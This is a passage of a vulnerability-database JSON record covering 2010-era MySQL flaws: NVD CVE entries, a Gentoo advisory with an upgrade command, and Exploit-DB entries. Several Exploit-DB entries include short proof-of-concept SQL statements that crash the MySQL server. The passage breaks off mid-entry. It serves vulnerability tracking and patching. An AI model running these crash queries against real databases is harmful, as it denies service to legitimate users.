"https://exchange.xforce.ibmcloud.com/vulnerabilities/64683", "http://bugs.mysql.com/bug.php?id=52512", "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00006.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:012", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:155", "http://www.securityfocus.com/bid/42625", "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00005.html", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://www.vupen.com/english/advisories/2011/0133", "http://www.openwall.com/lists/oss-security/2010/09/28/10"], "description": "Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.", "edition": 3, "reporter": "NVD", "published": "2011-01-11T15:00:01", "title": "CVE-2010-3683", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:10", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3683"], "scanner": [], "modified": "2018-01-04T21:29:03", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.5.4", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.5.0", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.5.3", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.5.2", "cpe:/a:mysql:mysql:5.5.1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3683", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:10", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "http://www.ubuntu.com/usn/USN-1397-1", "http://www.redhat.com/support/errata/RHSA-2010-0824.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html", "http://www.vupen.com/english/advisories/2011/0105", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://bugs.mysql.com/bug.php?id=54007", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://dev.mysql.com/doc/refman/5.5/en/news-5-5-5.html", "http://www.debian.org/security/2011/dsa-2143", "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00006.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:012", "http://www.securityfocus.com/bid/42633", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:155", "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00005.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64685", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "https://bugzilla.redhat.com/show_bug.cgi?id=628680", "http://www.vupen.com/english/advisories/2011/0133", "http://www.openwall.com/lists/oss-security/2010/09/28/10"], "description": "Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing \"alternate reads from two indexes on a table,\" which triggers an assertion failure.", "edition": 3, "reporter": "NVD", "published": "2011-01-11T15:00:01", "title": "CVE-2010-3681", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:10", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3681"], "scanner": [], "modified": "2018-01-04T21:29:02", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.5.4", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.5.0", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.5.3", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.5.2", "cpe:/a:mysql:mysql:5.5.1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3681", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3681", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:10", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "http://dev.mysql.com/doc/refman/5.5/en/news-5-5-6.html", "http://www.ubuntu.com/usn/USN-1397-1", "http://support.apple.com/kb/HT4723", "https://bugzilla.redhat.com/show_bug.cgi?id=640751", "http://www.vupen.com/english/advisories/2011/0105", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-92.html", "http://www.securityfocus.com/bid/43676", "http://www.debian.org/security/2011/dsa-2143", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64845", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://lists.apple.com/archives/security-announce/2011//Jun/msg00000.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:223", "http://bugs.mysql.com/bug.php?id=55826", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html"], "description": "MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a \"CREATE TABLE ... SELECT.\"", "edition": 3, "reporter": "NVD", "published": "2011-01-14T14:01:15", "title": "CVE-2010-3833", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:10", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3833"], "scanner": [], "modified": "2018-01-04T21:29:03", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.24a", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.5.4", "cpe:/a:mysql:mysql:5.0.3a", "cpe:/a:mysql:mysql:5.0.90", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.5.0", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.9", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:mysql:mysql:5.0.84", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.4a", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.0.0", "cpe:/a:mysql:mysql:5.0.88", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.1.49", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.0.67", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.86", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.5.3", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.0.45b", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.5.5", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.0.89", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.5.2", "cpe:/a:mysql:mysql:5.0.7", "cpe:/a:mysql:mysql:5.5.1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.50", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.25", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.3:beta", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.49:sp1", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.0.85", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.0.23", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.91", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.26", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.0.87", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.0.51b", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.0.51", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3833", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3833", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:06", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3836", "https://bugs.gentoo.org/show_bug.cgi?id=294187", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3679", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3840", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1848", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3683", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3834", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3677", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3681", "https://bugs.gentoo.org/show_bug.cgi?id=240407", "https://bugs.gentoo.org/show_bug.cgi?id=351413", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1849", "https://bugs.gentoo.org/show_bug.cgi?id=277717", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3676", "https://bugs.gentoo.org/show_bug.cgi?id=238117", "https://bugs.gentoo.org/show_bug.cgi?id=220813", "https://bugs.gentoo.org/show_bug.cgi?id=344987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2008", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3963", "https://bugs.gentoo.org/show_bug.cgi?id=237166", "https://bugs.gentoo.org/show_bug.cgi?id=321791", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1850", "https://bugs.gentoo.org/show_bug.cgi?id=319489", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-7247", "https://bugs.gentoo.org/show_bug.cgi?id=229329", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3680", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3682", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4484", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2446", "https://bugs.gentoo.org/show_bug.cgi?id=339717", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4098", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3678", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4097", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3839", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4028", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4456", "https://bugs.gentoo.org/show_bug.cgi?id=303747", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4019", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1621", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1626", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3837", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3833"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "5.1.56", "packageName": "dev-db/mysql", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nMySQL is a popular open-source multi-threaded, multi-user SQL database server. \n\n### Description\n\nMultiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated remote attacker may be able to execute arbitrary code with the privileges of the MySQL process, cause a Denial of Service condition, bypass security restrictions, uninstall arbitrary MySQL plugins, or conduct Man-in-the-Middle and Cross-Site Scripting attacks. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MySQL users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mysql-5.1.56\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since May 14, 2011. It is likely that your system is already no longer affected by this issue.", "edition": 1, "reporter": "Gentoo Foundation", "published": "2012-01-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "gentoo", "title": "MySQL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2446", "CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2008-4456", "CVE-2010-3839", "CVE-2010-3835", "CVE-2008-4097", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-1621", "CVE-2009-4028", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-1626", "CVE-2008-4098", "CVE-2010-2008", "CVE-2010-3676", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2008-3963", "CVE-2010-1850", "CVE-2010-3834", "CVE-2010-3838", "CVE-2010-1848", "CVE-2008-7247", "CVE-2010-1849", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2012-01-05T00:00:00", "id": "GLSA-201201-02", "href": "https://security.gentoo.org/glsa/201201-02", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T21:54:11", "osvdbidlist": ["67379"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service Vulnerability. CVE-2010-3678. Dos exploits for multiple platform", "reporter": "Shane Bester", "published": "2010-11-09T00:00:00", "type": "exploitdb", "title": "Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3678"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-11-09T00:00:00", "id": "EDB-ID:15467", "href": "https://www.exploit-db.com/exploits/15467/", "sourceData": "Source: http://www.securityfocus.com/bid/42596/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nThis issue affects versions prior to MySQL 5.1.49.\r\n\r\nNOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it. \r\n\r\nPoC:\r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`a` int)engine=myisam;\r\ninsert into `t1` values (1);\r\n/*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;\r\n/*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a`\r\nwith rollup;\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/15467/"}, {"lastseen": "2016-02-03T23:22:50", "osvdbidlist": ["67383"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MySQL 5.1.48 'EXPLAIN' Denial Of Service Vulnerability. CVE-2010-3682. Dos exploit for linux platform", "reporter": "Bjorn Munch", "published": "2010-08-20T00:00:00", "type": "exploitdb", "title": "MySQL <= 5.1.48 - 'EXPLAIN' Denial Of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3682"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-08-20T00:00:00", "id": "EDB-ID:34506", "href": "https://www.exploit-db.com/exploits/34506/", "sourceData": "source: http://www.securityfocus.com/bid/42599/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nThis issue affects versions prior to MySQL 5.1.49.\r\n\r\nNOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. \r\n\r\nCREATE TABLE t1 (a VARCHAR(10), FULLTEXT KEY a (a));\r\nINSERT INTO t1 VALUES (1),(2);\r\nCREATE TABLE t2 (b INT);\r\nINSERT INTO t2 VALUES (1),(2);\r\n\r\nEXPLAIN SELECT * FROM t1 UNION SELECT * FROM t1\r\n ORDER BY (SELECT a FROM t2 WHERE b = 12);\r\n\r\nEXPLAIN SELECT * FROM t2 UNION SELECT * FROM t2\r\n ORDER BY (SELECT * FROM t1 WHERE MATCH(a) AGAINST ('+abc' IN BOOLEAN MODE));\r\n\r\nDROP TABLE t1,t2;\r\n\r\nexit;\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34506/"}, {"lastseen": "2016-02-03T23:23:32", "osvdbidlist": ["67384"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "OraclMySQL 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability. CVE-2010-3683 . Dos exploit for linux platform", "reporter": "Elena Stepanova", "published": "2010-08-20T00:00:00", "type": "exploitdb", "title": "OraclMySQL <= 5.1.48 - 'LOAD DATA INFILE' Denial Of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3683"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-08-20T00:00:00", "id": "EDB-ID:34510", "href": "https://www.exploit-db.com/exploits/34510/", "sourceData": "source: http://www.securityfocus.com/bid/42625/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nThis issue affects versions prior to MySQL 5.1.49.\r\n\r\nNOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.\r\n\r\n# cat t/tst.test\r\n# The file might exist or not, it does not make any difference.\r\n# --send is important\r\n\r\nCREATE TABLE test.t_load (id INT NOT NULL);\r\n--send LOAD DATA LOCAL INFILE 'tb.txt' INTO TABLE test.t_load\r\n\r\n#<EOF>\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34510/"}, {"lastseen": "2016-02-03T23:22:38", "osvdbidlist": ["67381"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MySQL 5.1.48 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability. CVE-2010-3680. Dos exploit for php platform", "reporter": "Boris Reisig", "published": "2010-08-19T00:00:00", "type": "exploitdb", "title": "MySQL <= 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3680"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-08-19T00:00:00", "id": "EDB-ID:34505", "href": "https://www.exploit-db.com/exploits/34505/", "sourceData": "source: http://www.securityfocus.com/bid/42598/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit these issues to crash the database, denying access to legitimate users.\r\n\r\nThis issues affect versions prior to MySQL 5.1.49.\r\n\r\nNOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. \r\n\r\nmysql> SET 